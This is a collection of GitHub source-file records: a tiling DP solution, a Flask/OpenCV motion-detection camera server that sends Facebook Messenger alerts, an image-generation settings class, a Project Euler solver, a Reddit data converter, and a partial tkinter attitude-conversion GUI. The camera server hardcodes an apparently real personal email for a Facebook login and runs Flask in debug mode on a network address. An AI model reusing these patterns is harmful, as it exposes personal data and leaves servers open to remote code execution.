int(read().rstrip())\r\n\r\ndp=[0]*1010\r\n\r\ndp[1]=1\r\ndp[2]=3\r\ndp[3]=5\r\ncount = 1\r\nif(n>3):\r\n for i in range(4,n+1):\r\n dp[i] = dp[i-1] + 2*dp[i-2]\r\n\r\nprint(dp[n]%10007)","repo_name":"Dakota-Han/baekjoon","sub_path":"백준/Silver/11727. 
2×n 타일링 2/2×n 타일링 2.py","file_name":"2×n 타일링 2.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16672901078","text":"# -*- coding: UTF-8 -*-\n\nfrom flask import Flask, render_template, Response\nimport cv2, time, pandas\nfrom time import sleep\nimport sys\nfrom fbchat import Client\nfrom fbchat.models import *\nimport fbchat\nimport re\nfrom getpass import getpass\n# importing datetime class from datetime library\nfrom datetime import datetime\n\napp = Flask(__name__)\n\ncamera = cv2.VideoCapture(0)\n\nfbchat._util.USER_AGENTS = [\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\"]\nfbchat._state.FB_DTSG_REGEX = re.compile(r'\"name\":\"fb_dtsg\",\"value\":\"(.*?)\"')\n\nclient = Client(\"hamdan.radaideh@hotmail.com\", getpass())\n\nfrom requests import get\n\ndef send_msg(msg, image=None):  # image is unused by the callers below, so it defaults to None\n    time=str(datetime.now())\n    ip = get('https://api.ipify.org').text\n    receivers_ids=['1435843372'] #, '100036488761702']\n    for thread_id in receivers_ids:\n        print('Send text', file=sys.stdout)\n        client.send(\n            Message(text=msg+\" \\nat : \"+time+\"\\nGo to http://\"+str(format(ip))+\"/ \\n for live feed !\"),\n            thread_id=thread_id,\n            thread_type=ThreadType.USER\n        )\n\n\n\ndef gen_frames():  # generate frame by frame from camera\n    # Assigning our static_back to None\n    static_back = None\n\n    # List when any moving object appears\n    motion_list = [ None, None ]\n\n    # Time of movement\n    time = []\n\n    # Initializing DataFrame, one column is start\n    # time and other column is end time\n    df = pandas.DataFrame(columns = [\"Start\", \"End\"])\n    while True:\n        sleep(0.1)\n        # Capture frame-by-frame\n        success, frame = camera.read()  # read the camera frame\n        if not success:\n            break\n        else:\n            # Initializing motion = 0(no motion)\n            motion = 0\n\n            # Converting color image to gray_scale image\n            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n            # Converting gray scale image to GaussianBlur\n            # so that change can be found easily\n            gray = cv2.GaussianBlur(gray, (21, 21), 0)\n\n            # In first iteration we assign the value\n            # of static_back to our first frame\n            if static_back is None:\n                static_back = gray\n                continue\n\n            # Difference between static background\n            # and current frame(which is GaussianBlur)\n            diff_frame = cv2.absdiff(static_back, gray)\n\n            # If change in between static background and\n            # current frame is greater than 30 it will show white color(255)\n            thresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1]\n            thresh_frame = cv2.dilate(thresh_frame, None, iterations = 2)\n\n            # Finding contour of moving object\n            cnts,_ = cv2.findContours(thresh_frame.copy(),\n                               cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n            for contour in cnts:\n                if cv2.contourArea(contour) < 10000:\n                    continue\n                motion = 1\n\n                (x, y, w, h) = cv2.boundingRect(contour)\n                # making green rectangle around the moving object\n                cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\n            # Appending status of motion\n            motion_list.append(motion)\n\n            motion_list = motion_list[-2:]\n\n            ret, buffer = cv2.imencode('.jpg', frame)\n            frame = buffer.tobytes()\n\n            # Appending Start time of motion\n            if motion_list[-1] == 1 and motion_list[-2] == 0:\n                time.append(datetime.now())\n                send_msg(\"Motion Detected\")\n                print('Motion started', file=sys.stdout)\n\n            # Appending End time of motion\n            if motion_list[-1] == 0 and motion_list[-2] == 1:\n                time.append(datetime.now())\n                
send_msg(\"Motion Finished\")\n print('Motion finished', file=sys.stdout)\n\n\n\n key = cv2.waitKey(1)\n # if q entered whole process will stop\n if key == ord('q'):\n # if something is movingthen it append the end time of movement\n if motion == 1:\n time.append(datetime.now())\n break\n\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n') # concat frame one by one and show result\n\n\n@app.route('/video_feed')\ndef video_feed():\n #Video streaming route. Put this in the src attribute of an img tag\n return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route('/')\ndef index():\n \"\"\"Video streaming home page.\"\"\"\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True,use_reloader=False,host=\"192.168.1.20\")\n","repo_name":"halradaideh/surveillance_camera","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44898207545","text":"import threading\n\n\n# ---------------------------------------------------\n\n# class for API\n\nclass SynvillaAPI:\n \n _instance = None\n _lock = threading.Lock()\n\n def __new__(cls):\n if cls._instance is None: \n with cls._lock:\n # Another thread could have created the instance\n # before we acquired the lock. So check that the\n # instance is still nonexistent.\n if not cls._instance:\n cls._instance = super().__new__(cls)\n return cls._instance\n \n\n \n def __init__(self): \n self.status = \"\"\n self.status2 = \"\"\n self.version = \"\"\n \n self.text = \"\" #text \n self.ntext = \"\" #nprompt\n self.mtext = \"\"\n self.nmtext = \"\"\n \n self.resetL = False # reset latents\n self.newImg = False # new init image\n self.newMask = False\n self.resetMask = False\n self.resetImg = False # reset init image\n\n s = 0.5\n self.beta = s\n self.guidance = 0 #newLR = None\n self.steps = 50\n self.newsteps = self.steps\n \n self.ctr = None # iteration number\n self.extranoise = 0\n self.change_i = None\n self.seed = 0 #newseed = 0\n self.seedlock = False\n\n self.blend = 0\n self.mline = \"\"\n self.nmline = \"\"\n self.inpaint = 0\n \n #simg = False\n \n self.gamma = 1\n self.contrast = 1\n self.newprompt = False\n\n self.maxnoise = 0.6\n self.total = 0\n self.bg_w = 1\n self.fg_w = 1\n \n self.h = 768\n self.w = 768\n self.schedlist = []\n self.modelist = []\n self.model = \"\"\n self.sched = \"\" \n \n self.wh_changed = False\n self.model_changed = False\n self.sched_changed = False\n \n def getDataObj(self): \n \n d = type('', (), {})()\n d.text = self.text\n d.ntext = self.ntext\n d.mtext = self.mtext\n d.nmtext = self.nmtext\n d.i = self.ctr\n d.n = self.total\n d.beta = self.beta\n d.steps = self.newsteps\n d.lr = self.guidance\n d.seed = self.seed\n #d.fg = self.fg_w\n d.bgw = self.bg_w\n d.fgw = self.fg_w\n d.blend = self.blend\n d.gamma = self.gamma\n d.noise = self.extranoise\n d.status = self.status\n d.status2 = self.status2\n d.version = self.version\n \n # todo, include these only when needed\n d.modellist = self.modellist\n d.schedlist = self.schedlist\n d.model = self.model\n d.sched = self.sched\n d.h = self.h\n d.w = self.w\n d.inpaint = self.inpaint\n d.contrast = self.contrast\n \n \n #print(\"getobj\", d.text)\n \n return d\n \n def setSettings(self, h, w, m, s):\n if (h != self.h) or (w != self.w):\n self.wh_changed = True\n self.h = h\n self.w = w\n \n if (m != self.model):\n 
self.model_changed = True\n            self.model = m\n\n        if (s != self.sched):\n            self.sched_changed = True\n            self.sched = s\n\n        return\n\n    def setLock(self, s):\n        if int(s) == 0:\n            self.seedlock = False\n        else:\n            self.seedlock = True\n        return\n\n    def setSeed(self, s):\n        self.seed = int(s)\n        return\n\n    def setBlend(self, s):\n        self.blend = int(s)\n        print(\"blend set to \", s)\n        return\n\n    def setInpaint(self, s):\n        self.inpaint = int(s)\n\n    def setGamma(self, s):\n        self.gamma = float(s)\n        return\n\n    def setContrast(self, s):\n        self.contrast = float(s)\n        return\n\n    def resetLats(self):\n        self.resetL = True\n        print(\"set lats to be reset\")\n        return\n\n    def setText(self, text, ntext, mtext, nmtext):\n        print(\"new prompt:\", text, \"neg:\", ntext)\n        print(\"new mask prompt:\", mtext, \"neg:\", nmtext)\n        self.text = text\n        self.ntext = ntext\n        self.mtext = mtext\n        self.nmtext = nmtext\n        self.newprompt = True\n        return\n\n    def setBeta(self, val):\n        print(\"new beta:\", val, \" s=\", self.beta)\n        self.beta = float(val)\n        return\n\n    def setSteps(self, val):\n        print(\"new steps:\", val)\n        self.newsteps = int(val)\n        return\n\n    '''\n    def setIter(self, val):\n        print(\"jump to iter:\", val)\n        self.change_i = int(val)\n        return\n    '''\n\n    def setLR(self, val):\n        print(\"new g:\", val)\n        self.guidance = float(val)\n        return\n\n    def setNoise(self, val):\n        print(\"extra noise:\", val)\n        self.extranoise = float(val)\n        return\n\n    def setBgw(self, val):\n        print(\"attenuate:\", val)\n        self.bg_w = float(val)\n        return\n\n    def setFgw(self, val):\n        print(\"fgw:\", val)\n        self.fg_w = float(val)\n        return\n\n    def setImg(self):\n        print(\"img received\")\n        self.newImg = True\n        return\n\n    def setMask(self):\n        print(\"mask received\")\n        self.newMask = True\n        return\n\n    def clearMask(self):\n        # operates on the instance flag only; no global state involved\n        print(\"setting mask to none\")\n        self.resetMask = True\n        return\n\n    def getChanges(self):\n        go = self.newprompt\n        #self.newprompt = False\n        return go, self.text, self.ntext, self.mtext, self.nmtext\n\n\n# ---------------------------------------------------------","repo_name":"htoyryla/synvilla","sub_path":"synvilla_api.py","file_name":"synvilla_api.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13852799186","text":"from numba import jit\nfrom math import gcd  # fractions.gcd was removed in Python 3.9; math.gcd is the replacement\n\n@jit\ndef solve(n):\n    N = 5 * (10 ** 6)\n    mu = [0] * N\n    mu[1] = 1\n    for d in range(1, N):\n        for i in range(d + d, N, d):\n            mu[i] -= mu[d]\n    coprimes = [0] * N\n    for d in range(1, N):\n        for i in range(d, N, d):\n            coprimes[i] += mu[d] * (i // d)\n\n    result = 2\n    d = 3\n    while coprimes[d] * d // 2 <= n:\n        result += coprimes[d]\n        n -= d * coprimes[d] // 2\n        d += 1\n    result1 = result + (n // d) * 2\n    x = d // 2\n    while gcd(x, d) != 1:\n        x -= 1\n    result2 = result + 1 + (n - d + x) // d * 2\n    return max(result1, result2)\n\nprint(solve(1))\nprint(solve(3))\nprint(solve(9))\nprint(solve(11))\nprint(solve(100))\nprint(solve(50000))\nprint(solve(10 ** 18))\n","repo_name":"ftiasch/acm-icpc","sub_path":"project-euler/p604.py","file_name":"p604.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"53"} +{"seq_id":"28525186295","text":"import json\nimport sys\nimport random\n\nin_file = sys.argv[1]\nout_file = in_file.replace(\".json\", \".utt.json\")\nwith open(in_file, 'r') as in_data, open(out_file, 'w') as out_data:\n    for line in in_data:\n        
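# skip lines that are not valid JSON records\n        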
try:\n data = json.loads(line)\n except:\n continue\n utterance = data[\"body\"].strip()\n if len(utterance.split()) < 2:\n continue\n label = random.choice([\"yes\", \"no\"])\n try:\n json_obj = json.dumps({\"utterance\": utterance, \"label\": label})\n except:\n continue\n out_data.write(json_obj + \"\\n\")","repo_name":"amazon-science/label-aware-pretrain","sub_path":"data/reddit/make_json.py","file_name":"make_json.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"25278480142","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 13:08:54 2018\n\n@author: aarvai\n\"\"\"\n\nimport numpy as np\nfrom tkinter import Tk\nfrom tkinter import Entry, DoubleVar, END, N, E, S, W\nfrom tkinter import ttk\n\n# Select tkinter style\n# s = ttk.Style()\n# print(\"Tkinter theme options are:\")\n# print(s.theme_names())\n# print(\"Current Tkinter theme:\")\n# print(s.theme_use())\n# s.theme_use('clam')\n\n\nclass AcsGui:\n\n enter_value: Entry\n\n def __init__(self, master):\n\n global ephSunPosX, ephSunPosY, ephSunPosZ\n global ephJwstPosX, ephJwstPosY, ephJwstPosZ\n global ephSunVecX, ephSunVecY, ephSunVecZ\n global ephSunVecNormX, ephSunVecNormY, ephSunVecNormZ\n\n global att1RA, att1Dec, att1PA\n global att1Quat1, att1Quat2, att1Quat3, att1Quat4\n global att1SunRoll, att1SunPitch, att1SunYaw\n\n global att2RA, att2Dec, att2PA\n global att2Quat1, att2Quat2, att2Quat3, att2Quat4\n global att2SunRoll, att2SunPitch, att2SunYaw\n\n global slewMom, slewDur, slewAngRoll, slewAngPitch, slewAngYaw\n\n global vectorsEciX, vectorsEciY, vectorsEciZ\n global vectorsJ1, vectorsJ2, vectorsJ3\n\n # Ephemeris Variables\n ephSunPosX = DoubleVar()\n ephSunPosY = DoubleVar()\n ephSunPosZ = DoubleVar()\n ephJwstPosX = DoubleVar()\n ephJwstPosY = DoubleVar()\n ephJwstPosZ = DoubleVar()\n ephSunVecX = DoubleVar()\n ephSunVecY = DoubleVar()\n ephSunVecZ = DoubleVar()\n ephSunVecNormX = DoubleVar()\n ephSunVecNormY = DoubleVar()\n ephSunVecNormZ = DoubleVar()\n\n # Attitude 1 Variables\n att1RA = DoubleVar()\n att1Dec = DoubleVar()\n att1PA = DoubleVar()\n att1Quat1 = DoubleVar()\n att1Quat2 = DoubleVar()\n att1Quat3 = DoubleVar()\n att1Quat4 = DoubleVar()\n att1SunRoll = DoubleVar()\n att1SunPitch = DoubleVar()\n att1SunYaw = DoubleVar()\n\n # Attitude 2 Variables\n att2RA = DoubleVar()\n att2Dec = DoubleVar()\n att2PA = DoubleVar()\n att2Quat1 = DoubleVar()\n att2Quat2 = DoubleVar()\n att2Quat3 = DoubleVar()\n att2Quat4 = DoubleVar()\n att2SunRoll = DoubleVar()\n att2SunPitch = DoubleVar()\n att2SunYaw = DoubleVar()\n\n # Slew Variables\n slewMom = DoubleVar()\n slewDur = DoubleVar()\n slewAngRoll = DoubleVar()\n slewAngPitch = DoubleVar()\n slewAngYaw = DoubleVar()\n\n # Vectors Variables\n vectorsEciX = DoubleVar()\n vectorsEciY = DoubleVar()\n vectorsEciZ = DoubleVar()\n vectorsJ1 = DoubleVar()\n vectorsJ2 = DoubleVar()\n vectorsJ3 = DoubleVar()\n\n # print(\"Tkinter theme options are:\")\n # print(ttk.Style().theme_names())\n # print(\"Current Tkinter theme:\")\n # print(ttk.Style().theme_use())\n # ttk.Style().theme_use('vista')\n print(ttk.Style().lookup(\"TButton\", \"font\"))\n\n #ttk.Style().configure(\"TLabel\", padding=10)\n #ttk.Style().configure(\"TEntry\", padding=10)\n #print(ttk.Style().element_options('TButton'))\n\n # Title\n self.title = ttk.Label(text=\"ACS Conversion Tool\")\n self.title.grid(row=0, column=0, columnspan=10)\n\n # Define top-level frames\n self.ephFrame = 
ttk.Frame(master, relief='ridge')\n self.ephFrame.grid(row=1, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n self.att1Frame = ttk.Frame(master, relief='ridge')\n self.att1Frame.grid(row=2, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n self.att2Frame = ttk.Frame(master, relief='ridge')\n self.att2Frame.grid(row=3, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n self.slewFrame = ttk.Frame(master, relief='ridge')\n self.slewFrame.grid(row=4, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n self.vectorsFrame = ttk.Frame(master, relief='ridge')\n self.vectorsFrame.grid(row=5, column=0, padx=10, pady=2, ipadx=20, ipady=2, sticky=E+W)\n\n # Ephemeris Section---------------------------------------------------------------------------------------------\n\n # Ephemeris Top Level Layout---------------------------------------\n\n # Ephemeris Title\n self.ephemLabel = ttk.Label(self.ephFrame, text=\"Ephemeris\")\n self.ephemLabel.grid(row=0, column=0, columnspan=6, pady=2)\n\n # Ephemeris Position Frame\n self.ephPosFrame = ttk.Frame(self.ephFrame, relief='groove')\n self.ephPosFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.ephFrame.columnconfigure(0, weight=4)\n\n # Button to Convert Positions to Sun Vector\n self.ephPosToVecButton = ttk.Button(self.ephFrame, text=\"▶\", width=2, command=self.ephPosToVec)\n self.ephPosToVecButton.grid(row=1, column=1)\n self.ephFrame.columnconfigure(1, weight=1)\n\n # Ephemeris Sun Vector Frame\n self.ephSunVecFrame = ttk.Frame(self.ephFrame,relief='groove')\n self.ephSunVecFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.ephFrame.columnconfigure(2, weight=2)\n\n # Convert sun vector to normalized sun vector\n self.ephVecToNormVecButton = ttk.Button(self.ephFrame, text=\"▶\", width=2, command=self.ephVecToNormVec)\n self.ephVecToNormVecButton.grid(row=1, column=3)\n self.ephFrame.columnconfigure(3, weight=1)\n\n # Ephemeris Sun Vector Frame\n self.ephSunVecNormFrame = ttk.Frame(self.ephFrame,relief='groove')\n self.ephSunVecNormFrame.grid(row=1, column=4, ipady=2)\n self.ephFrame.columnconfigure(4, weight=3)\n\n # Clear ephem\n self.ephClearButton = ttk.Button(self.ephFrame, text=\"Clear\", width=5, command=self.ephClear)\n self.ephClearButton.grid(row=1, column=5, padx=10)\n self.ephFrame.columnconfigure(0, weight=4)\n\n # Ephemeris Position Frame - Details ------------------------------\n\n self.ephPosLabel = ttk.Label(self.ephPosFrame, text=\"Positions (ECI, km)\")\n self.ephPosLabel.grid(row=0, column=0, columnspan=3, pady=2)\n\n self.ephPosXLabel = ttk.Label(self.ephPosFrame, text=\"x\")\n self.ephPosXLabel.grid(row=2, column=0, padx=5)\n\n self.ephPosYLabel = ttk.Label(self.ephPosFrame, text=\"y\")\n self.ephPosYLabel.grid(row=3, column=0, padx=5)\n\n self.ephPosZLabel = ttk.Label(self.ephPosFrame, text=\"z\")\n self.ephPosZLabel.grid(row=4, column=0, padx=5)\n\n self.ephSunLabel = ttk.Label(self.ephPosFrame, text=\"Sun\")\n self.ephSunLabel.grid(row=1, column=1)\n\n self.ephSunPosXEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephSunPosX)\n self.ephSunPosXEntry.grid(row=2, column=1)\n self.ephSunPosXEntry.focus_set()\n\n self.ephSunPosYEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephSunPosY)\n self.ephSunPosYEntry.grid(row=3, column=1)\n\n self.ephSunPosZEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephSunPosZ)\n self.ephSunPosZEntry.grid(row=4, column=1)\n\n self.ephJwstLabel = ttk.Label(self.ephPosFrame, text=\"JWST\")\n self.ephJwstLabel.grid(row=1, 
column=2)\n\n self.ephJwstPosXEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephJwstPosX)\n self.ephJwstPosXEntry.grid(row=2, column=2)\n\n self.ephJwstPosYEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephJwstPosY)\n self.ephJwstPosYEntry.grid(row=3, column=2)\n\n self.ephJwstPosZEntry = ttk.Entry(self.ephPosFrame, width=10, textvariable=ephJwstPosZ)\n self.ephJwstPosZEntry.grid(row=4, column=2)\n\n # Ephemeris Sun Vector Frame - Details-----------------------------\n self.ephSunVecLabel = ttk.Label(self.ephSunVecFrame, text=\"Sun Vector\")\n self.ephSunVecLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.ephSunVecUnitLabel = ttk.Label(self.ephSunVecFrame, text=\"(ECI, km)\")\n self.ephSunVecUnitLabel.grid(row=1, column=0, columnspan=2)\n\n self.ephSunVecXLabel = ttk.Label(self.ephSunVecFrame, text=\"x\")\n self.ephSunVecXLabel.grid(row=2, column=0, padx=5)\n\n self.ephSunVecYLabel = ttk.Label(self.ephSunVecFrame, text=\"y\")\n self.ephSunVecYLabel.grid(row=3, column=0, padx=5)\n\n self.ephSunVecZLabel = ttk.Label(self.ephSunVecFrame, text=\"z\")\n self.ephSunVecZLabel.grid(row=4, column=0, padx=5)\n\n self.ephSunVecXEntry = ttk.Entry(self.ephSunVecFrame, width=10, textvariable=ephSunVecX)\n self.ephSunVecXEntry.grid(row=2, column=1)\n\n self.ephSunVecYEntry = ttk.Entry(self.ephSunVecFrame, width=10, textvariable=ephSunVecY)\n self.ephSunVecYEntry.grid(row=3, column=1)\n\n self.ephSunVecZEntry = ttk.Entry(self.ephSunVecFrame, width=10, textvariable=ephSunVecZ)\n self.ephSunVecZEntry.grid(row=4, column=1)\n\n # Ephemeris Normalized Sun Vector Frame - Details------------------\n\n self.ephSunVecNormLabel = ttk.Label(self.ephSunVecNormFrame, text=\"Sun Vector Normalized\")\n self.ephSunVecNormLabel.grid(row=0, column=0, columnspan=2, padx=5, pady=2)\n\n self.ephSunVecNormUnitLabel = ttk.Label(self.ephSunVecNormFrame, text=\"(ECI, unitless)\")\n self.ephSunVecNormUnitLabel.grid(row=1, column=0, columnspan=2)\n\n self.ephSunVecNormXLabel = ttk.Label(self.ephSunVecNormFrame, text=\"x\")\n self.ephSunVecNormXLabel.grid(row=2, column=0)\n\n self.ephSunVecNormYLabel = ttk.Label(self.ephSunVecNormFrame, text=\"y\")\n self.ephSunVecNormYLabel.grid(row=3, column=0)\n\n self.ephSunVecNormZLabel = ttk.Label(self.ephSunVecNormFrame, text=\"z\")\n self.ephSunVecNormZLabel.grid(row=4, column=0)\n\n self.ephSunVecNormXEntry = ttk.Entry(self.ephSunVecNormFrame, width=10, textvariable=ephSunVecNormX)\n self.ephSunVecNormXEntry.grid(row=2, column=1)\n\n self.ephSunVecNormYEntry = ttk.Entry(self.ephSunVecNormFrame, width=10, textvariable=ephSunVecNormY)\n self.ephSunVecNormYEntry.grid(row=3, column=1)\n\n self.ephSunVecNormZEntry = ttk.Entry(self.ephSunVecNormFrame, width=10, textvariable=ephSunVecNormZ)\n self.ephSunVecNormZEntry.grid(row=4, column=1)\n\n # Attitude 1 Section--------------------------------------------------------------------------------------------\n\n # Attitude 1 Top Level Layout--------------------------------------\n\n # Attitude 1 Title\n self.att1Label = ttk.Label(self.att1Frame, text=\"Attitude 1\")\n self.att1Label.grid(row=0, column=0, columnspan=6, padx=0, pady=2)\n\n # Attitude 1 Celestial Frame\n self.att1CelestFrame = ttk.Frame(self.att1Frame, relief='groove')\n self.att1CelestFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.att1Frame.columnconfigure(0, weight=4)\n\n # Attitude 1 Button 1 Frame\n self.att1But1Frame = ttk.Frame(self.att1Frame)\n self.att1But1Frame.grid(row=1, column=1, ipady=2)\n self.att1Frame.columnconfigure(1, 
weight=1)\n\n # Attitude 1 Quaternion Frame\n self.att1QuatFrame = ttk.Frame(self.att1Frame, relief='groove')\n self.att1QuatFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.att1Frame.columnconfigure(2, weight=4)\n\n # Attitude 1 Button 2 Frame\n self.att1But2Frame = ttk.Frame(self.att1Frame)\n self.att1But2Frame.grid(row=1, column=3, ipady=2)\n self.att1Frame.columnconfigure(3, weight=1)\n\n # Attitude 1 Celestial Frame\n self.att1SunAngFrame = ttk.Frame(self.att1Frame, relief='groove')\n self.att1SunAngFrame.grid(row=1, column=4, ipadx=10, ipady=2)\n self.att1Frame.columnconfigure(4, weight=2)\n\n # Clear att1\n self.att1ClearButton = ttk.Button(self.att1Frame, text=\"Clear\", width=5, command=self.att1Clear)\n self.att1ClearButton.grid(row=1, column=5, padx=10)\n self.att1Frame.columnconfigure(5, weight=4)\n\n # Attitude 1 Celestial Frame - Details----------------------------\n\n self.att1CelestLabel = ttk.Label(self.att1CelestFrame, text=\"Celestial\")\n self.att1CelestLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att1RALabel = ttk.Label(self.att1CelestFrame, text=\"RA\")\n self.att1RALabel.grid(row=1, column=0, padx=5)\n\n self.att1DecLabel = ttk.Label(self.att1CelestFrame, text=\"Dec\")\n self.att1DecLabel.grid(row=2, column=0, padx=5)\n\n self.att1PALabel = ttk.Label(self.att1CelestFrame, text=\"PA\")\n self.att1PALabel.grid(row=3, column=0, padx=5)\n\n self.att1RAEntry = ttk.Entry(self.att1CelestFrame, width=10, textvariable=att1RA)\n self.att1RAEntry.grid(row=1, column=1)\n\n self.att1DecEntry = ttk.Entry(self.att1CelestFrame, width=10, textvariable=att1Dec)\n self.att1DecEntry.grid(row=2, column=1)\n\n self.att1PAEntry = ttk.Entry(self.att1CelestFrame, width=10, textvariable=att1PA)\n self.att1PAEntry.grid(row=3, column=1)\n\n # Attitude 1 Button 1 Frame - Details-----------------------------\n\n # Button to Convert Celestial to Quaternion\n self.att1CelestToQuatButton = ttk.Button(self.att1But1Frame, text=\"▶\", width=2, command=self.att1CelestToQuat)\n self.att1CelestToQuatButton.grid(row=1, column=1)\n\n # Button to Convert Quaternion to Celestial\n self.att1QuatToCelestButton = ttk.Button(self.att1But1Frame, text=\"◀\", width=2, command=self.att1QuatToCelest)\n self.att1QuatToCelestButton.grid(row=2, column=1)\n\n # Attitude 1 Quaternion Frame - Details----------------------------\n\n self.att1QuatLabel = ttk.Label(self.att1QuatFrame, text=\"Quaternion\")\n self.att1QuatLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att1Quat1Label = ttk.Label(self.att1QuatFrame, text=\"q1\")\n self.att1Quat1Label.grid(row=1, column=0, padx=5)\n\n self.att1Quat2Label = ttk.Label(self.att1QuatFrame, text=\"q2\")\n self.att1Quat2Label.grid(row=2, column=0, padx=5)\n\n self.att1Quat3Label = ttk.Label(self.att1QuatFrame, text=\"q3\")\n self.att1Quat3Label.grid(row=3, column=0, padx=5)\n\n self.att1Quat4Label = ttk.Label(self.att1QuatFrame, text=\"q4\")\n self.att1Quat4Label.grid(row=4, column=0, padx=5)\n\n self.att1Quat1Entry = ttk.Entry(self.att1QuatFrame, width=10, textvariable=att1Quat1)\n self.att1Quat1Entry.grid(row=1, column=1)\n\n self.att1Quat2Entry = ttk.Entry(self.att1QuatFrame, width=10, textvariable=att1Quat2)\n self.att1Quat2Entry.grid(row=2, column=1)\n\n self.att1Quat3Entry = ttk.Entry(self.att1QuatFrame, width=10, textvariable=att1Quat3)\n self.att1Quat3Entry.grid(row=3, column=1)\n\n self.att1Quat4Entry = ttk.Entry(self.att1QuatFrame, width=10, textvariable=att1Quat4)\n self.att1Quat4Entry.grid(row=4, column=1)\n\n # Attitude 1 Button 2 Frame - 
Details-----------------------------\n\n # Button to Convert Quaternion to Sun Angles\n self.att1CelestToSunAngBut = ttk.Button(self.att1But2Frame, text=\"▶\", width=2, command=self.att1QuatToSunAng)\n self.att1CelestToSunAngBut.grid(row=1, column=1)\n\n # Button to Convert Sun Angles to Quaternion\n self.att1CelestToSunAngBut = ttk.Button(self.att1But2Frame, text=\"◀\", width=2, command=self.att1SunAngToQuat)\n self.att1CelestToSunAngBut.grid(row=2, column=1)\n\n # Attitude 1 Sun Angles Frame - Details---------------------------\n\n self.att1SunAngLabel = ttk.Label(self.att1SunAngFrame, text=\"Sun Angles\")\n self.att1SunAngLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att1SunRollLabel = ttk.Label(self.att1SunAngFrame, text=\"Sun Roll\")\n self.att1SunRollLabel.grid(row=1, column=0, padx=5)\n\n self.att1SunPitchLabel = ttk.Label(self.att1SunAngFrame, text=\"Sun Pitch\")\n self.att1SunPitchLabel.grid(row=2, column=0, padx=5)\n\n self.att1SunYawLabel = ttk.Label(self.att1SunAngFrame, text=\"Sun Yaw\")\n self.att1SunYawLabel.grid(row=3, column=0, padx=5)\n\n self.att1SunRollEntry = ttk.Entry(self.att1SunAngFrame, width=10, textvariable=att1SunRoll)\n self.att1SunRollEntry.grid(row=1, column=1)\n\n self.att1SunPitchEntry = ttk.Entry(self.att1SunAngFrame, width=10, textvariable=att1SunPitch)\n self.att1SunPitchEntry.grid(row=2, column=1)\n\n self.att1SunYawEntry = ttk.Entry(self.att1SunAngFrame, width=10, textvariable=att1SunYaw)\n self.att1SunYawEntry.grid(row=3, column=1)\n self.att1SunYawEntry.delete(0,END)\n self.att1SunYawEntry.config(state='disable')\n\n # Attitude 2 Section--------------------------------------------------------------------------------------------\n\n # Attitude 2 Top Level Layout--------------------------------------\n\n # Attitude 2 Title\n self.att2Label = ttk.Label(self.att2Frame, text=\"Attitude 2\")\n self.att2Label.grid(row=0, column=0, columnspan=6, padx=0, pady=2)\n\n # Attitude 2 Celestial Frame\n self.att2CelestFrame = ttk.Frame(self.att2Frame, relief='groove')\n self.att2CelestFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.att2Frame.columnconfigure(0, weight=4)\n\n # Attitude 2 Button 1 Frame\n self.att2But1Frame = ttk.Frame(self.att2Frame)\n self.att2But1Frame.grid(row=1, column=1, ipady=2)\n self.att2Frame.columnconfigure(1, weight=1)\n\n # Attitude 2 Quaternion Frame\n self.att2QuatFrame = ttk.Frame(self.att2Frame, relief='groove')\n self.att2QuatFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.att2Frame.columnconfigure(2, weight=4)\n\n # Attitude 2 Button 2 Frame\n self.att2But2Frame = ttk.Frame(self.att2Frame)\n self.att2But2Frame.grid(row=1, column=3, ipady=2)\n self.att2Frame.columnconfigure(3, weight=1)\n\n # Attitude 2 Celestial Frame\n self.att2SunAngFrame = ttk.Frame(self.att2Frame, relief='groove')\n self.att2SunAngFrame.grid(row=1, column=4, ipadx=10, ipady=2)\n self.att2Frame.columnconfigure(4, weight=2)\n\n # Clear att2\n self.att2ClearButton = ttk.Button(self.att2Frame, text=\"Clear\", width=5, command=self.att2Clear)\n self.att2ClearButton.grid(row=1, column=5, padx=10)\n self.att2Frame.columnconfigure(5, weight=4)\n\n # Attitude 2 Celestial Frame - 